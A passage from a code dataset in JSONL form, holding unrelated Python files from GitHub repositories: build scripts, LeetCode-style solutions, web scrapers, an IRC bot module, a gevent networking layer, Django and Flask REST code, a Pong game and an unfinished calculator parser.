run(self):\n shutil.rmtree(\"tmp_build\", ignore_errors=True)\n extensions = ['so', 'dll', 'pyd']\n for path in chain.from_iterable(PACKAGE.glob(\"*.%s\" % ext) for ext in extensions):\n path.unlink()\n super().run()\n\n\ndef paths_to_str(paths):\n return [p.as_posix() for p in paths]\n\n\nwith open(REQUIREMENTS_FILE) as reqs:\n requirements = set(reqs.read().splitlines())\n\n# do not spoil pre-installed opencv (in case it was built from source)\n_opencv_package = \"opencv-python\"\ntry:\n import cv2\n\n if _opencv_package in requirements:\n requirements.remove(_opencv_package)\nexcept ImportError:\n requirements.add(_opencv_package)\n\n\nc_sources = [\n PACKAGE / 'ie_driver.cpp',\n PACKAGE / 'ie_driver.hpp',\n\n PACKAGE / 'c_ie_driver.pxd',\n PACKAGE / 'ie_driver.pyx',\n PACKAGE / 'ie_driver.pxd',\n]\n\nextensions = [\n Extension(C_LIB_NAME, paths_to_str(c_sources))\n]\n\ncmdclass = {\n 'build_ext': build_ext,\n 'build_py': build_py,\n 'clean': clean,\n 'install': install,\n}\n\nsetup(\n name=\"src\",\n version='1.0',\n description='Python inference for Inference Engine',\n packages=find_packages(exclude=['tests']),\n package_data={PACKAGE_NAME: ['*.so', '*.dll', '*dylib*', '*.pyd']},\n include_package_data=True,\n ext_modules=extensions,\n cmdclass=cmdclass,\n install_requires=list(requirements),\n 
zip_safe=False,\n)\n","repo_name":"pc2/CustoNN2","sub_path":"dldt/inference-engine/ie_bridges/python/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":5880,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"3122703312","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def binaryTreePaths(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[str]\n \"\"\"\n stack = [(root,\"\")]\n res = []\n if not root:\n return res\n while stack:\n t = stack.pop()\n node = t[0]\n strr = t[1]\n if not node.left and not node.right:\n res.append(strr + str(node.val))\n if node.left:\n stack.append((node.left,strr + str(node.val) + \"->\"))\n if node.right:\n stack.append((node.right,strr + str(node.val) + \"->\"))\n return res\n","repo_name":"tr1503/LeetCode","sub_path":"Depth First Search/binaryTreePaths.py","file_name":"binaryTreePaths.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18180900982","text":"from decouple import config\nimport requests\n\n\n# Convert search term to url dynamically\ndef search_to_url(search):\n # Split search string into seperate words\n search_spliced = search.split()\n\n # Length of string\n length_search_splice = len(search_spliced)\n\n # Declare empty variable string for new url\n raw_url_bridge_beg = \"\"\n\n # Loop through each word and concatenate to empty string variable declared in previous step\n for i, word in enumerate(search_spliced):\n # If not last word in search string, add lowercased word to string and a plus afterwards\n if i != (length_search_splice - 1):\n raw_url_bridge_beg += word.lower() + \"+\"\n # If is last word, add only lowercased word to string wihthout +\n else:\n raw_url_bridge_beg += word.lower()\n\n raw_url_start = config(\"RAW_URL_START\")\n raw_url_bridge_final = raw_url_bridge_beg\n raw_url_end = config(\"RAW_URL_END\")\n\n # Concatenate start, string variable we created and end of url to final url and return to bottle_bot.py \n final_url = raw_url_start + raw_url_bridge_final + raw_url_end\n\n return final_url\n\n\n# Check if scrapped bottle matches users requested search criteria\ndef name_filter_auto(bottle_search, bottle_input_new):\n if bottle_search.title() == bottle_input_new:\n return True\n else:\n return False\n\n\ndef slugify(text):\n slug = \"\"\n for letter in text.lower():\n if letter.isalnum():\n slug += letter\n elif letter == \" \":\n slug += \"+\"\n return slug\n\n\ndef convert():\n endpoint = \"https://cdn.jsdelivr.net/gh/fawazahmed0/currency-api@1/latest/currencies/gbp.json\"\n response = requests.get(endpoint)\n data = response.json()\n print(data[\"gbp\"][\"usdt\"])\n return data[\"gbp\"][\"usdt\"]\n\n\n","repo_name":"anpythomas/booggle_deploy","sub_path":"valuator/operations/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17491599326","text":"# coding: UTF-8\nimport os\n\n\ndef set_requires_grad(nets, requires_grad=False):\n if not isinstance(nets, list):\n nets = [nets]\n for net in nets:\n if net is None:\n continue\n for param in net.parameters():\n param.requires_grad = requires_grad\n\n\ndef save_args(log_dir, args):\n fpath = os.path.join(log_dir, 
'args.txt')\n with open(fpath, 'w') as f:\n f.writelines(\n ['{}: {}\\n'.format(arg, getattr(args, arg))\n for arg in dir(args) if not arg.startswith('_')])\n os.system('cat {}'.format(fpath))\n","repo_name":"fujiki-1emon/CycleGAN.repro","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30146402887","text":"\"\"\"\r\n\n\nCreate a function that takes a number `n` as an argument and checks whether\nthe given number can be expressed as a sum of **two or more consecutive\npositive numbers**.\n\n### Examples\n\n consecutiveSum(9) ➞ True\n # 9 can be expressed as a sum of (2 + 3 + 4) or (4 + 5).\n \n consecutiveSum(10) ➞ True\n # 10 can be expressed as a sum of 1 + 2 + 3 + 4.\n \n consecutiveSum(64) ➞ False\n\n### Notes\n\nN/A\n\n\"\"\"\r\n\ndef consecutive_sum(n):\n total = 0\n for i in range(n):\n total += i\n for j in range(i+1,n):\n if total > n:\n total = 0\n break\n if total == n:\n return True\n total += j\n return False\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"srEFhCNueikMKs3oT_18.py","file_name":"srEFhCNueikMKs3oT_18.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28425499596","text":"import random\nimport re\n\nfrom twisted.plugin import IPlugin\nfrom zope.interface import implementer\n\nfrom desertbot.message import IRCMessage\nfrom desertbot.moduleinterface import IModule, BotModule, ignore\nfrom desertbot.response import IRCResponse\n\n\n@implementer(IPlugin, IModule)\nclass Animals(BotModule):\n def actions(self):\n return super(Animals, self).actions() + [('message-channel', 1, self.respond),\n ('message-user', 1, self.respond),\n ('action-channel', 1, self.respond),\n ('action-user', 1, self.respond)]\n\n def help(self, arg):\n return 'Responds to animal noises.'\n\n def onLoad(self) -> None:\n defaultReactions = {\n \"1\": \"{user} critically fails at being {article} {animal}.\",\n \"8\": \"{user} is not {article} {animal}.\",\n \"14\": \"{user} /might/ be {article} {animal}.\",\n \"19\": \"{user} is DEFINITELY {article} {animal}.\",\n \"20\": \"{user} is a CRITICAL {animal}!\"\n }\n self.animalResponses = self.storage[\"animals\"]\n self.animalReactions = dict(self.storage[\"animalCustomReactions\"]) # copy stored dict so we can extend with defaultReactions\n for _, animalName in self.animalResponses.items():\n if animalName not in self.animalReactions:\n self.animalReactions[animalName] = dict(defaultReactions)\n\n @ignore\n def respond(self, message: IRCMessage) -> IRCResponse:\n for match, animal in self.animalResponses.items():\n if re.search(r'^{}([^\\s\\w]+)?$'.format(match), message.messageString, re.IGNORECASE):\n # roll a d20\n roll = random.randint(1, 20)\n\n # construct animal reaction based on roll\n reactions = self.animalReactions[animal]\n # toungue-in-cheek default response, in case of Math Weirdness\n reaction = \"{user} broke the animal responder, they're CLEARLY a magician!\"\n # check each roll range and its matching reaction, which one do we want for the current roll?\n for rollMax, reactionCandidate in reactions.items():\n if roll == int(rollMax):\n # rolled exactly equal to one of the range maximums, this candidate is our wanted response\n reaction = reactionCandidate\n break\n elif roll > int(rollMax):\n # rolled higher than this range maximum, try next one\n continue\n else:\n # rolled 
lower than this range maximum, but higher than a previous one, this candidate is our wanted response\n reaction = reactionCandidate\n break\n\n article = \"an\" if animal[0] in 'aeiou' else \"a\"\n # the reaction has placeholders, fill them out\n reaction = reaction.format(user=message.user.nick, article=article, animal=animal)\n\n return IRCResponse(reaction, message.replyTo)\n\n\nanimals = Animals()\n","repo_name":"DesertBot/DesertBot","sub_path":"desertbot/modules/automatic/Animals.py","file_name":"Animals.py","file_ext":"py","file_size_in_byte":3211,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"12504094555","text":"import gevent\n\nfrom gevent.event import Event\nfrom gevent.server import StreamServer\nfrom gevent.socket import create_connection\nfrom gevent.queue import Queue\nfrom gevent import socket\n\nfrom twiggy import log; logger = log.name(__name__)\n\nclass DisconnectedException(Exception):\n \"\"\"\n Exception thrown when session gets disconnected, used to stop loops\n \"\"\"\n\n pass\n\nclass Session(object):\n \"\"\"\n Base class for network connections (sessions)\n \"\"\"\n\n # Method to call when a packet arrives\n # if None don't call\n packetHandler = None\n\n def __init__(self, socket = None, address = None):\n \"\"\"\n Initialize a `Session`\n\n :socket: Socket to use for this session\n :address: Address the socket is connected to/from\n \"\"\"\n\n self.sendQueue = Queue()\n\n self.recvGreenlet = None\n self.sendGreenlet = None\n self.finished = Event()\n\n self.cleanExit = False\n\n self.socket = socket\n self.address = address\n\n self.log = logger.name(\"session\") \\\n .fields(host = address[0], port = address[1])\n\n def _sendPacket(self, packet):\n \"\"\"\n Send a packet, writing it to the socket\n\n `_sendLoop` will stop if this does not return True\n \"\"\"\n\n try:\n self.log.debug(\"Sending packet: {}\", packet)\n self.socket.sendall(\"{}\\n\".format(packet))\n self.log.debug(\"Sent packet: {}\", packet)\n except socket.error as e:\n # If an error occurs put packet back on the queue\n self.log.error(\"_sendPacket error: {}\", e)\n self.disconnect()\n self.sendQueue.put(packet)\n return False\n\n return True\n\n def _sendLoop(self):\n \"\"\"Loop for sending packets\"\"\"\n\n self.log.debug(\"Starting send loop...\")\n\n try:\n while True:\n packet = self.sendQueue.get()\n if not self._sendPacket(packet):\n break\n except DisconnectedException:\n self.log.debug(\"_sendLoop killed\")\n finally:\n self.log.debug(\"Send loop stopped\")\n\n def send(self, packet):\n \"\"\"\n Send a packet.\n\n Queues the packet to be sent out as soon as possible.\n\n :packet: Packet to send\n \"\"\"\n\n self.log.debug(\"Queueing packet: {}\", packet)\n self.sendQueue.put(packet)\n\n def _recvPacket(self, packet):\n \"\"\"\n Internal method for receiving a packet\n\n :packet: Packet received\n \"\"\"\n packet = packet[:-1] # Remove trailing newline\n\n self.log.debug(\"Packet received: {}\", packet)\n\n if self.packetHandler:\n self.packetHandler(packet)\n\n def _recvLoop(self):\n \"\"\"Loop for receiving packets\"\"\"\n\n self.log.debug(\"Starting recv loop...\")\n sockfile = self.socket.makefile()\n\n while True:\n try:\n packet = sockfile.readline()\n except socket.error as e:\n self.log.error(\"_recvLoop, exception: {}\", e)\n self.disconnect()\n break\n\n # Stop if packet is None\n if not packet:\n break\n\n self._recvPacket(packet)\n\n # Only error level if not clean exit\n if not self.cleanExit:\n 
self.log.error(\"Connection lost\")\n else:\n self.log.debug(\"Socket disconnected\")\n\n self.onDisconnect()\n self.log.debug(\"Recv loop stopped\")\n\n def start(self):\n \"\"\"Starts the recv and send loops\"\"\"\n\n self.log.debug(\"Starting session loops\")\n\n self.recvGreenlet = gevent.spawn(self._recvLoop)\n self.sendGreenlet = gevent.spawn(self._sendLoop)\n\n def disconnect(self):\n \"\"\"Cleanly disconnect the connection\"\"\"\n\n self.log.debug(\"Disconnecting...\")\n\n self.cleanExit = True\n self.socket.close()\n\n self.finished.set()\n\n def onDisconnect(self):\n \"\"\"Method called on disconnect\"\"\"\n\n self.sendGreenlet.kill(DisconnectedException)\n\n self.recvGreenlet = None\n self.sendGreenlet = None\n\nclass ServerSession(Session):\n \"\"\"\n Server specific implementation of a `Session`\n \"\"\"\n\n def __init__(self, server, socket, address):\n \"\"\"\n Initialize `ServerSession`\n\n :server: Server this connection is spawned from\n\n For more info see `Session.__init__`\n \"\"\"\n\n self.server = server\n\n Session.__init__(self, socket, address)\n\n def _recvLoop(self):\n \"\"\"Modified `_recvLoop` to let the `Server` handle disconnects properly\"\"\"\n\n Session._recvLoop(self)\n self.server.handleDisconnect(self)\n\nclass Server(object):\n \"\"\"\n Listens for incoming connections and keeps track of active sessions\n \"\"\"\n\n # What to use as session factory\n session = ServerSession\n\n def __init__(self, port):\n \"\"\"\n Initialize the `Server`\n\n :port: Port to listen on\n \"\"\"\n\n self.port = port\n self.server = StreamServer((\"0.0.0.0\", port), self.handleConnect)\n self.serverGreenlet = None\n\n self.sessions = set()\n\n self.log = logger.name(\"server\") \\\n .fields(port = port)\n\n def listen(self):\n \"\"\"Start listening\"\"\"\n\n self.serverGreenlet = gevent.spawn(self.server.serve_forever)\n self.log.info(\"Started listening on port {}\", self.port)\n\n def handleConnect(self, socket, address):\n \"\"\"\n Handle a new connection\n\n :socket: Socket object for the connection\n :address: (ip, port) tuple of the remote client\n \"\"\"\n\n self.log.info(\"Client connected from {}:{}\", address[0], address[1])\n\n session = self.session(self, socket, address)\n session.start()\n\n # Add session to active sessions\n self.sessions.add(session)\n\n def handleDisconnect(self, session):\n \"\"\"\n Handle a client disconnecting\n\n :session: Session of the client that disconnected\n \"\"\"\n\n # Remove session from active sessions\n self.sessions.remove(session)\n\n def sendAll(self, packet):\n \"\"\"\n Send a packet to all sessions\n\n :packet: Packet to send\n \"\"\"\n\n for session in self.sessions:\n session.send(packet)\n\nclass Client(Session):\n \"\"\"Client specific extension to `Session` including reconnect\"\"\"\n\n # How long to wait between reconnect intervals\n retryInterval = 5\n\n def __init__(self, address):\n \"\"\"\n Initialize the client\n\n :address: (host, port) tuple to connect to\n \"\"\"\n\n Session.__init__(self, address = address)\n\n def connect(self):\n \"\"\"Connect to a server\"\"\"\n\n # Reset `cleanExit`\n self.cleanExit = False\n\n # Keep retrying the connection\n while True:\n try:\n self.socket = create_connection(self.address, 2)\n break\n except socket.error as e:\n self.log.debug(\"Connect failed ({}), retrying in {} seconds\",\n e, self.retryInterval\n )\n gevent.sleep(self.retryInterval)\n\n self.start()\n\n def _recvLoop(self):\n \"\"\"Modified `_recvLoop` to implement automatic reconnecting\"\"\"\n\n 
Session._recvLoop(self)\n self.connect()\n","repo_name":"thegeekoftheworld/xstats","sub_path":"xstats/daemon/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":7404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"36167545650","text":"# Solution: 전체가 몇일 인지 구한 뒤, 날짜 수를 이용해 계산\n\ninputdata=input().split()\n\nx=int(inputdata[0])\ny=int(inputdata[1])\n\ntotalday=[31,28,31,30,31,30,31,31,30,31,30,31]\n\ntotal=y\n\n#Total date calculate\nif x!=1:\n for i in range(x-1):\n total=total+totalday[i]\n\nrest=total%7\nif rest==1:\n print('MON')\nelif rest==2:\n print('TUE')\nelif rest==3:\n print('WED')\nelif rest==4:\n print('THU')\nelif rest==5:\n print('FRI')\nelif rest==6:\n print('SAT')\nelse:\n print('SUN')\n","repo_name":"golony6449/Algo_train","sub_path":"boj/1924.py","file_name":"1924.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21262086087","text":"import requests\nimport pandas as pd\nfrom bs4 import BeautifulSoup as bs\nfrom bs4 import BeautifulSoup\nimport datetime\nimport os\nimport random\nimport json\n\nr = requests.get(\"https://stockanalysis.com/etf/\", headers={\"User-Agent\":\"Mozilla/5.0\"})\nsoup2 = BeautifulSoup(r.text,\"html.parser\")\nscript = soup2.find(\"script\",{\"id\":\"__NEXT_DATA__\"})\na1 = json.loads(soup2.find_all(\"script\")[4].string)[1]\netf_symbols = pd.DataFrame(a1[\"data\"]).s.to_list()\n \n# Not sure if some dont update due to times. Add shuffle to randomly loop.\nrandom.shuffle(etf_symbols)\n# This ensures that at least spy and qqq runs first\netf_symbols.remove(\"SPY\")\netf_symbols.remove(\"QQQ\")\netf_symbols.insert(0, \"QQQ\")\netf_symbols.insert(0, \"SPY\")\n\nfor etf in etf_symbols:\n try:\n file = f\"data/{etf}.csv\"\n link = f\"https://stockanalysis.com/etf/{etf}/holdings/\"\n r = requests.get(link, headers={\"User-Agent\":\"Mozilla/5.0\"})\n soup = bs(r.text, \"html.parser\")\n soup = soup.find(\"table\")\n tds = soup.findAll(\"td\")\n tickers = []\n for i in tds[1::5]:\n tickers.append(i.text)\n percents = []\n for i in tds[3::5]:\n percents.append(float(i.text.strip(\"%\")))\n df = pd.DataFrame(data=[percents])\n df.columns = tickers\n df.index = [datetime.datetime.now().strftime(\"%m/%d/%Y\")]\n df[\"SUM\"] = df.sum(axis=1)\n if df.columns.value_counts().max() > 1:\n # Seems to occur for me with symbol 1117.hk having many desciptions as an example\n print(\"Too many entries\")\n print(etf)\n continue\n\n try:\n df_historical = pd.read_csv(file, index_col=0)\n new_df = pd.concat([df_historical, df], axis=0).fillna(0)\n except FileNotFoundError:\n new_df = df.copy()\n # Make SUM the last column\n ordered_cols = list(new_df.columns)\n ordered_cols.remove(\"SUM\")\n ordered_cols += [\"SUM\"]\n new_df = new_df[ordered_cols]\n new_df.to_csv(file)\n if etf == \"SPY\":\n print(\"SPY Saved\")\n except Exception as e:\n print(\"error\")\n print(etf)\n pass\n","repo_name":"jmaslek/etf_scraper","sub_path":"scrape_holdings.py","file_name":"scrape_holdings.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"34902207400","text":"from django.contrib.auth.models import User\nfrom django.db import transaction\nfrom rest_framework import serializers\nfrom rest_framework.serializers import ModelSerializer\n\nfrom apps.core.models import AddressFrom, AddressTo, Order, 
Stuff\n\n\nclass AddressFromSerializer(ModelSerializer):\n class Meta:\n model = AddressFrom\n fields = \"__all__\"\n\n\nclass AddressToSerializer(ModelSerializer):\n class Meta:\n model = AddressTo\n fields = \"__all__\"\n\n\nclass StuffSerializer(ModelSerializer):\n class Meta:\n model = Stuff\n fields = \"__all__\"\n\n\nclass OrdersListSerializer(ModelSerializer):\n address_from = serializers.ReadOnlyField(source=\"address_from.city\")\n address_to = serializers.ReadOnlyField(source=\"address_to.city\")\n\n class Meta:\n model = Order\n fields = \"__all__\"\n\n\nclass OrderSerializer(ModelSerializer):\n address_from = AddressFromSerializer()\n address_to = AddressToSerializer()\n stuff = StuffSerializer()\n\n class Meta:\n model = Order\n fields = \"__all__\"\n\n @transaction.atomic\n def create(self, validated_data):\n user = User.objects.get(id=validated_data.pop(\"user\").id)\n address_from = AddressFrom.objects.create(\n **validated_data.pop(\"address_from\")\n )\n address_to = AddressTo.objects.create(\n **validated_data.pop(\"address_to\")\n )\n stuff = Stuff.objects.create(**validated_data.pop(\"stuff\"))\n instance = Order.objects.create(\n address_from=address_from,\n user=user,\n address_to=address_to,\n stuff=stuff,\n **validated_data\n )\n return instance\n","repo_name":"beproxy/drf_utest_pylint","sub_path":"backend/apps/core/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33409738728","text":"# This is a sample Python script.\n\n# Press Shift+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\n\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\n\nfrom turtle import Screen\nfrom paddle import Paddle\nfrom ball import Ball\nfrom scoreboard import Scoreboard\nimport time\n\nscreen = Screen()\nscreen.setup(width=800, height=600)\nscreen.bgcolor(\"black\")\nscreen.title(\"My Pong Game\")\nscreen.tracer(0)\n\nr_paddle = Paddle((350, 0))\nl_paddle = Paddle((-350, 0))\nball = Ball()\nscoreboard = Scoreboard()\n\n\nscreen.listen()\nscreen.onkey(r_paddle.up, \"Up\")\nscreen.onkey(r_paddle.down, \"Down\")\nscreen.onkey(l_paddle.up, \"w\")\nscreen.onkey(l_paddle.down, \"s\")\n\n\ngame_is_on = True\nwhile game_is_on:\n time.sleep(ball.move_speed)\n screen.update()\n ball.move()\n\n # detect collision with wall\n if ball.ycor() > 280 or ball.ycor() < -280:\n ball.bounce_y()\n\n # detect collision with right paddle\n if ball.distance(r_paddle) < 50 and ball.xcor() > 320 or ball.distance(l_paddle) < 50 and ball.xcor() < -320:\n # print(\"Made contact.\")\n ball.bounce_x()\n\n # detect when right paddle misses\n if ball.xcor() > 390:\n ball.reset_position()\n scoreboard.l_point()\n\n # detect when left paddle misses\n if ball.xcor() < -390:\n ball.reset_position()\n scoreboard.r_point()\n\nscreen.exitonclick()","repo_name":"jsoto3000/angela-yu-100-days-python","sub_path":"day-022-pong/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71371956252","text":"from sys import stdin,stdout\n\nt = int(stdin.readline().strip())\n\nfor _ in range(t):\n n,m = map(int,stdin.readline().split())\n M = []\n for _ in range(n):\n M.append(list(map(int,stdin.readline().split())))\n\n counts = {}\n for i in range(n):\n for j 
in range(m):\n k = i+j\n counts[k] = counts.get(k,0)+M[i][j]\n\n ans = 0\n s,e,c,d = 0,m+n-2,2,2*min(m,n)\n while s < e:\n a = counts[s]+counts[e]\n ans += min(a,c-a)\n s,e,c = s+1,e-1,min(d,c+2)\n\n stdout.write('{}\\n'.format(ans))\n","repo_name":"xiema/competitive","sub_path":"codeforces/1366C_palinpaths.py","file_name":"1366C_palinpaths.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16105531035","text":"\"\"\"\nModule that defines the REST API for the Department model.\n\"\"\"\n\nfrom flask import request\nfrom flask_restful import Resource\nfrom sqlalchemy import exc as sqlalchemy_err\n\nfrom department_app.service import DepartmentService\nfrom .utils import format_exception_message, log_unhandled_exception\n\n\nclass DepartmentListAPI(Resource):\n \"\"\"\n Defines the REST API for getting the full list of departments and creating a new one.\n \"\"\"\n\n @staticmethod\n def get():\n \"\"\"\n Get request handler.\n @return: list of departments dictionaries\n \"\"\"\n\n deps = DepartmentService.get_all_departments()\n return [dep.to_dict() for dep in deps]\n\n @staticmethod\n def post():\n \"\"\"\n Put request handler.\n @return: new department as dictionary, if one was successfully created\n \"\"\"\n\n try:\n name = request.form.get(\"name\")\n description = request.form.get(\"description\")\n new_dep = DepartmentService.create_department(name=name, description=description)\n except (ValueError, TypeError) as exc:\n return format_exception_message(exception=exc), 400\n except sqlalchemy_err.IntegrityError as exc:\n return format_exception_message(exc.orig), 400\n except Exception as exc:\n log_unhandled_exception(exc)\n return format_exception_message(), 500\n\n return new_dep.to_dict(), 202\n\n\nclass DepartmentAPI(Resource):\n \"\"\"\n Defines the REST API for a single department query.\n \"\"\"\n\n @staticmethod\n def get(dep_id):\n \"\"\"\n Get request handler.\n @param dep_id: id of the department to get\n @return: department as a dictionary or 404 error if department does not exist\n \"\"\"\n\n dep = DepartmentService.get_department_by_id(dep_id=dep_id)\n res = dep.to_dict()\n res[\"average_salary\"] = DepartmentService.get_department_average_salary(dep)\n res[\"employee_count\"] = DepartmentService.get_department_employee_count(dep)\n\n employee_sample = DepartmentService.get_department_employee_sample(dep, 3)\n res[\"employee_sample\"] = []\n for employee in employee_sample:\n res[\"employee_sample\"].append(employee.to_dict())\n\n return res\n\n @staticmethod\n def patch(dep_id):\n \"\"\"\n Patch request handler, for editing a department.\n If a parameter is None, it is not changed in the department.\n @param dep_id: id of the department to update\n @return: edited department as a dictionary or 404 error if department does not exist\n \"\"\"\n dep = DepartmentService.get_department_by_id(dep_id=dep_id)\n name = request.form.get(\"name\", default=None)\n description = request.form.get(\"description\", default=None)\n\n try:\n updated_dep = DepartmentService.update_department(\n department=dep, name=name, description=description\n )\n\n except (ValueError, TypeError) as exc:\n return format_exception_message(exception=exc), 400\n except sqlalchemy_err.IntegrityError as exc:\n return format_exception_message(exc.orig), 400\n except Exception as exc:\n log_unhandled_exception(exc)\n return format_exception_message(), 500\n\n return updated_dep.to_dict(), 202\n\n 
@staticmethod\n def put(dep_id):\n \"\"\"\n Put request handler, for editing a department.\n If a parameter is None, it is set as None in the department.\n @param dep_id: id of the department to update\n @return: edited department as a dictionary or 404 error if department does not exist\n \"\"\"\n dep = DepartmentService.get_department_by_id(dep_id=dep_id)\n name = request.form.get(\"name\", default=\"\")\n description = request.form.get(\"description\", default=\"\")\n\n try:\n updated_dep = DepartmentService.update_department(\n department=dep, name=name, description=description\n )\n\n except (ValueError, TypeError) as exc:\n return format_exception_message(exception=exc), 400\n except sqlalchemy_err.IntegrityError as exc:\n return format_exception_message(exc.orig), 400\n except Exception as exc:\n log_unhandled_exception(exc)\n return format_exception_message(), 500\n\n return updated_dep.to_dict(), 202\n\n @staticmethod\n def delete(dep_id):\n \"\"\"\n Delete request handler.\n @param dep_id: id of the department to delete\n \"\"\"\n dep = DepartmentService.get_department_by_id(dep_id=dep_id)\n DepartmentService.delete_department(department=dep)\n","repo_name":"leirimnad/EPAMPython","sub_path":"department_app/rest/department_api.py","file_name":"department_api.py","file_ext":"py","file_size_in_byte":4720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5879396588","text":"import transform\nimport pytest\nfrom etl_exceptions import NotCorrectDateType\nfrom to_utc_functions.to_utc_function_int import to_utc_function_int\nfrom to_utc_functions.to_utc_function_str_date import to_utc_function_str_date\n\n\ndef test_empty_tz_columns():\n test_transformer = transform.APITransformer()\n assert test_transformer.tz_columns == []\n\n\ndef test_load_functions_from_to_utc_functions():\n data = [[1,11],[2,22],[3,33],]\n header=[1,2]\n test_transformer = transform.APITransformer(header=header, data=data)\n result = [function.__name__ for function in test_transformer.functions_list]\n assert 'to_utc_function_int' in result\n assert 'to_utc_function_str_date' in result\n\n\ndef test_convert_int_ts_ok():\n data = [[1,11],[2,22],[3,33],]\n header=[1,2]\n tz_columns = [0]\n test_transformer = transform.APITransformer(header=header, data=data, tz_columns=tz_columns)\n expected = to_utc_function_int(1)\n assert test_transformer.data[0][0] == expected\n\n\ndef test_convert_str_ts_ok():\n data = [[1,'2023-09-28 23:15:00+00:00'],[2,'2023-09-28 23:20:00+00:00'],[3,'2023-09-28 23:25:00+00:00'],]\n header=[1,2]\n tz_columns = [1]\n test_transformer = transform.APITransformer(header=header, data=data, tz_columns=tz_columns)\n expected = to_utc_function_str_date('2023-09-28 23:15:00+00:00')\n assert test_transformer.data[0][1] == expected\n\n\ndef test_convert_nonsense_ts_raises_exception():\n data = [[1,None],[2,None],[3,None],]\n header=[1,2]\n tz_columns = [1]\n with pytest.raises(NotCorrectDateType):\n transform.APITransformer(header=header, data=data, tz_columns=tz_columns)\n","repo_name":"josemrsantos/trailstone","sub_path":"etl/tests/test_transform.py","file_name":"test_transform.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72593121691","text":"import re\nfrom itertools import chain\nfrom pythonds.basic.stack import Stack\nfrom collections import deque\n\n\ndef check_the_sign(numbers_arr):\n for i in range(1, len(numbers_arr), 2):\n if 
len(numbers_arr[i]) > 1:\n if numbers_arr[i][0] == '-':\n if len(numbers_arr[i]) % 2 != 0:\n numbers_arr[i] = '-'\n else:\n numbers_arr[i] = '+'\n else:\n numbers_arr[i] = '+'\n\n return numbers_arr\n\n\ndef convert_positive_num(user_input):\n input_arr = user_input.split(' ')\n for i, el in enumerate(input_arr):\n if el[0] == '+':\n input_arr[i] = el[1:]\n\n return user_input\n\n\ndef check_if_input_correct(user_input):\n if user_input[0] == '/' and (user_input != '/help' and user_input != '/exit'):\n print('Unknown command')\n return False\n\n input_arr = convery_to_array_2(user_input)\n\n op = ['^', '+', '-', '*', '/']\n count_p_l = 0\n count_p_r = 0\n for i, el in enumerate(input_arr):\n if i < len(input_arr)-1:\n if el in op and input_arr[i+1] in op and ((el != '+' and input_arr[i+1] != '+') or(el != '-' and input_arr[i+1] != '-')):\n print('Invalid expression')\n return False\n elif el == '(' and input_arr[i+1] == ')':\n print('Invalid expression')\n return False\n elif el == ')' and input_arr[i+1] == '(':\n print('Invalid expression')\n return False\n elif input_arr[len(input_arr) -1] in op:\n print('Invalid expression')\n return False\n\n if el == '(':\n count_p_l += 1\n elif el == ')':\n count_p_r += 1\n\n if count_p_l != count_p_r:\n print('Invalid expression')\n return False\n\n\n pattern_num = '[0-9]+'\n pattern_letter = '[A-Za-z]+'\n output = True\n\n if '=' in user_input:\n return True\n\n for count, el in enumerate(input_arr):\n\n if re.match(pattern_num, el):\n if el[len(el) - 1] == '+' or el[len(el) - 1] == '-':\n output = False\n return output\n elif re.match(pattern_num, el):\n if count < len(input_arr) - 1 and re.match(pattern_num, input_arr[count + 1]):\n output = False\n return output\n\n return output\n\n\ndef change_input_to_arr(user_input):\n input_arr = re.split('\\s+', user_input)\n\n for i, el in enumerate(input_arr):\n if len(el) > 1:\n input_arr[i] = list(el)\n\n return list(chain.from_iterable(input_arr))\n\n\ndef check_input_correctness(input_arr, variables):\n\n equal_sign = 0\n if '=' in input_arr:\n for el in input_arr:\n if el == '=':\n equal_sign += 1\n if equal_sign > 1:\n print('Invalid assignment')\n return False\n\n if equal_sign == 1:\n equal_s_index = input_arr.index('=')\n first_part = ''.join(input_arr[:equal_s_index])\n last_part = ''.join(input_arr[equal_s_index + 1:])\n variable = ''.join(first_part)\n\n if re.match('^[a-zA-Z]+$', variable):\n if re.match('^[0-9]+$', ''.join(last_part)):\n value = int(''.join(last_part))\n variables[variable] = value\n elif re.match('^[a-zA-Z]+$', ''.join(last_part)):\n key = 